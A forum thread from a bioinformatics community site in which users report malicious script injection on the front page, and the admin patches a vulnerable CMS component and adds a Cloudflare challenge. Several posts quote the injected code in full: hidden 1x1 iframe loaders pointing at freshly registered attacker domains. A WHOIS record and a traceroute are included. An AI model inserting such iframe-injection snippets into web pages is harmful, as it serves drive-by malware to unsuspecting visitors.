SEQanswers

Go Back   SEQanswers > Site News > Site Feedback/Suggestions



Similar Threads
Thread Thread Starter Forum Replies Last Post
Java security hassles Will Nelson Bioinformatics 4 01-26-2014 05:04 PM
DHSS 2013:The International Defense and Homeland Security Simulation Workshop Msc-les Events / Conferences 0 12-14-2012 07:24 AM
Staff Network and Information Security Engineer San Diego #2160 illumina Industry Jobs! 0 11-17-2009 12:41 PM

Reply
 
Thread Tools
Old 07-09-2015, 07:04 AM   #1
Richard Finney
Senior Member
 
Location: bethesda

Join Date: Feb 2009
Posts: 694
Default script injection : seqanswers security Q?

Just checking on this.

Is this legit? If it's not, are others seeing this too?

When I load seqanswers.com ; the first html is a request for a script from
http://xrrkp.yourrevolution.xyz:9449

Example:
<script>document.write("<iframe width='1' height='1' src='http://xrrkp.yourrevolution.xyz:9449/mirror.shtml?boom=78825&foul=ashamed&close=9014&listen=49237&peril=queer&snarl=encourage&monday=60544&quiver=86886&build=42380' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />

<title>SEQanswers Home </title>



This is blocked by my local antivirus software.

The domain http://www.domainiq.com/domain?yourrevolution.xyz
was registered 9 hours ago.

Is there something fishy going on?
___
Edit:

Now is trying to load from http://pkpgk.yourspin.xyz:32551
Is anybody else getting this? According to http://www.domainiq.com/domain?yourspin.xyz , Max Vlapet registered it 10 hours ago.

____

I know ad companies use pop-up domains to bypass adblockers, but this looks very fishy.

Can others "view source" and seqanswers and confirm if this is specific to seqanswers.com ? Just check the first lines of text.

I am getting this on both Chrome and Mozilla.

Traceroute is ...
traceroute 46.108.156.159
traceroute to 46.108.156.159 (46.108.156.159), 30 hops max, 60 byte packets
(first 8 internal to my site removed)
9 66-192-62-13.static.twtelecom.net (66.192.62.13) 4.129 ms 4.642 ms 4.623 ms
10 35.248.2.162 (35.248.2.162) 15.903 ms 15.884 ms 15.748 ms
11 xe-0.equinix.asbnva01.us.bb.gin.ntt.net (206.126.236.12) 5.522 ms 5.877 ms 5.051 ms
12 ae-2.r22.asbnva02.us.bb.gin.ntt.net (129.250.5.136) 5.045 ms 5.312 ms 4.661 ms
13 ae-4.r20.frnkge04.de.bb.gin.ntt.net (129.250.3.21) 92.425 ms 95.965 ms 90.690 ms
14 ae-2.r02.frnkge04.de.bb.gin.ntt.net (129.250.3.94) 133.892 ms 145.722 ms ae-3.r03.frnkge03.de.bb.gin.ntt.net (129.250.6.249) 130.568 ms
15 ae-4.r00.buchro01.ro.bb.gin.ntt.net (129.250.3.79) 126.092 ms 129.742 ms 124.872 ms
16 te5-6-600-bb1.buc1.ro.m247.ro (83.217.231.94) 120.913 ms 132.615 ms 118.762 ms
17 * * *
18 no-rdns.indicii.ro (46.108.156.159) 133.803 ms 129.671 ms 128.985 ms
____
Edit: others at my site are getting it, too.

Last edited by Richard Finney; 07-09-2015 at 07:25 AM.
Richard Finney is offline   Reply With Quote
Old 07-09-2015, 07:33 AM   #2
Brian Bushnell
Super Moderator
 
Location: Walnut Creek, CA

Join Date: Jan 2014
Posts: 2,707
Default

Code:
<script>document.write("<iframe width='1' height='1' src='http://gcqwgonvjv.your-trend.xyz:48310/punish/74636/alter/wonderful/load/79852/chuckle/another/date/33701/arrange/562/sugar/67761/matter/49098/find/33964/tidings/hush/opportunity/39426/' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

	<meta http-equiv="Cache-Control" content="no-cache" />
	<meta http-equiv="Pragma" content="no-cache" />
	<meta http-equiv="Expires" content="0" />


<title>SEQanswers Home </title>
Brian Bushnell is offline   Reply With Quote
Old 07-09-2015, 07:36 AM   #3
Richard Finney
Senior Member
 
Location: bethesda

Join Date: Feb 2009
Posts: 694
Default

your-trend.xzy is the same server (in Romania) ?


So it's not some local injection.

Whois reports Domain name is reported as

Email is associated with ~46 domains
Reverse Whois
Registrant Org Max Vlapet is associated with ~40 other domains
Dates Created on 2015-07-09 - Expires on 2016-07-09 - Updated on 2015-07-09
Whois Server whois.nic.xyz
Website
Website Title None given.
Whois Record ( last updated on 2015-07-09 )
Domain Name: YOUR-TREND.XYZ
Domain ID: D8789917-CNIC
WHOIS Server: whois.alpnames.com
Referral URL: http://www.alpnames.com
Updated Date: 2015-07-09T14:14:47.0Z
Creation Date: 2015-07-09T14:14:46.0Z
Registry Expiry Date: 2016-07-09T23:59:59.0Z
Sponsoring Registrar: AlpNames Limited
Sponsoring Registrar IANA ID: 1857
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registrant ID: ALP_44867689
Registrant Name: Max Vlapet
Registrant Organization: N/A
Registrant Street: Mausoleum str, pl.13
Registrant City: Moscow
Registrant State/Province: Moscow
Registrant Postal Code: 123006
Registrant Country: RU
Registrant Phone: +7.4959826524
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:
Admin ID: ALP_44867689
Admin Name: Max Vlapet
Admin Organization: N/A
Admin Street: Mausoleum str, pl.13
Admin City: Moscow
Admin State/Province: Moscow
Admin Postal Code: 123006
Admin Country: RU
Admin Phone: +7.4959826524
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email:
Tech ID: ALP_44867689
Tech Name: Max Vlapet
Tech Organization: N/A
Tech Street: Mausoleum str, pl.13
Tech City: Moscow
Tech State/Province: Moscow
Tech Postal Code: 123006
Tech Country: RU
Tech Phone: +7.4959826524
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email:
Name Server: NS2.YOUR-TREND.XYZ
Name Server: NS1.YOUR-TREND.XYZ
DNSSEC: unsigned
Billing ID: ALP_44867689
Billing Name: Max Vlapet
Billing Organization: N/A
Billing Street: Mausoleum str, pl.13
Billing City: Moscow
Billing State/Province: Moscow
Billing Postal Code: 123006
Billing Country: RU
Billing Phone: +7.4959826524
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email:
Richard Finney is offline   Reply With Quote
Old 07-10-2015, 06:56 AM   #4
Richard Finney
Senior Member
 
Location: bethesda

Join Date: Feb 2009
Posts: 694
Default

Load seq answers front page.
View the source.

Note the PHISH(?) injection at the top?

I got this just now ...

<script>document.write("<iframe width='1' height='1' src='http://yuarzwpcf.yqxjoksljg.cf:9654/slip/49615/peculiar/curiosity/embarrass/15638/brandy/wife/disgust/80297/' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />

<title>SEQanswers Home </title>

It's also loading from gvfwytmdxobu.tk , tk is not a supported top level domain; according to http://whois.icann.org/en/lookup?name=yqxjoksljg.cf ????

https://en.wikipedia.org/wiki/.tk#Abuse

Last edited by Richard Finney; 07-10-2015 at 07:11 AM.
Richard Finney is offline   Reply With Quote
Old 07-10-2015, 08:18 AM   #5
GenoMax
Senior Member
 
Location: East Coast USA

Join Date: Feb 2008
Posts: 6,761
Default

Can you PM ECO about this?
GenoMax is offline   Reply With Quote
Old 07-10-2015, 08:24 AM   #6
ECO
--Site Admin--
 
Location: SF Bay Area, CA, USA

Join Date: Oct 2007
Posts: 1,355
Default

On it. Thanks guys.
ECO is offline   Reply With Quote
Old 07-10-2015, 03:03 PM   #7
ECO
--Site Admin--
 
Location: SF Bay Area, CA, USA

Join Date: Oct 2007
Posts: 1,355
Default

Whew. Pretty easy cleanup. Culprit was an old ad server.

Forums have been upgraded and using a new adserver that is (at least for now) free of exploits.

Please verify that you're not seeing the previous problems, and let me know asap if you see any other weirdness.

Sorry about that all!
ECO is offline   Reply With Quote
Old 07-10-2015, 03:44 PM   #8
Richard Finney
Senior Member
 
Location: bethesda

Join Date: Feb 2009
Posts: 694
Default

I'm not seeing the injected script.
Richard Finney is offline   Reply With Quote
Old 07-10-2015, 05:00 PM   #9
Brian Bushnell
Super Moderator
 
Location: Walnut Creek, CA

Join Date: Jan 2014
Posts: 2,707
Default

Thanks for fixing this quickly!
Brian Bushnell is offline   Reply With Quote
Old 07-17-2015, 06:49 AM   #10
Richard Finney
Senior Member
 
Location: bethesda

Join Date: Feb 2009
Posts: 694
Default

Script injection is happening again. Fri Jul 17 10:49:19 EDT 2015

This time it's ...
zosnoeem.lzokxrvrcmtprgesy.ml

http://whois.domaintools.com/lzokxrvrcmtprgesy.ml
Richard Finney is offline   Reply With Quote
Old 07-17-2015, 06:54 AM   #11
GenoMax
Senior Member
 
Location: East Coast USA

Join Date: Feb 2008
Posts: 6,761
Default

I have let ECO know.
GenoMax is offline   Reply With Quote
Old 07-17-2015, 07:12 AM   #12
ECO
--Site Admin--
 
Location: SF Bay Area, CA, USA

Join Date: Oct 2007
Posts: 1,355
Default

Got it again. Turns out it wasn't the ad server. Not going to say what it is for now.
ECO is offline   Reply With Quote
Old 07-17-2015, 07:13 AM   #13
ECO
--Site Admin--
 
Location: SF Bay Area, CA, USA

Join Date: Oct 2007
Posts: 1,355
Default

Flood attacks whenever it happens...

ECO is offline   Reply With Quote
Old 07-17-2015, 08:04 AM   #14
ECO
--Site Admin--
 
Location: SF Bay Area, CA, USA

Join Date: Oct 2007
Posts: 1,355
Default

Upping the security level of cloudflare to prevent it again until I can upgrade the vulnerable component. Apologies for the 5 second delay.
ECO is offline   Reply With Quote
Old 07-17-2015, 10:10 AM   #15
ECO
--Site Admin--
 
Location: SF Bay Area, CA, USA

Join Date: Oct 2007
Posts: 1,355
Default

Thanks to Richard Finney for notification and GenoMax for his rapid locating of both 1.) me and 2.) the likely exploit.

The version of the front page CMS I'm using had an exploit, which I have upgraded.

I'm going to leave the CloudFlare security challenge on through the weekend to stop further DDoS/overload attacks, I welcome feedback on how annoying it is.
ECO is offline   Reply With Quote
Old 07-18-2015, 06:37 PM   #16
Brian Bushnell
Super Moderator
 
Location: Walnut Creek, CA

Join Date: Jan 2014
Posts: 2,707
Default

It's not annoying to me. A few seconds the first time you load the page in some number of hours, and subsequently, no delay. Even the first time, it still loads faster than typical pages with animated content or animated ads.
Brian Bushnell is offline   Reply With Quote
Old 07-18-2015, 06:39 PM   #17
SNPsaurus
Registered Vendor
 
Location: Eugene, OR

Join Date: May 2013
Posts: 442
Default

I'm just afraid that I check SeqAnswers so often that I'll be mistaken for a DDoS attack.
__________________
Providing nextRAD genotyping and PacBio sequencing services. http://snpsaurus.com
SNPsaurus is offline   Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT -8. The time now is 04:25 PM.


Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Single Sign On provided by vBSSO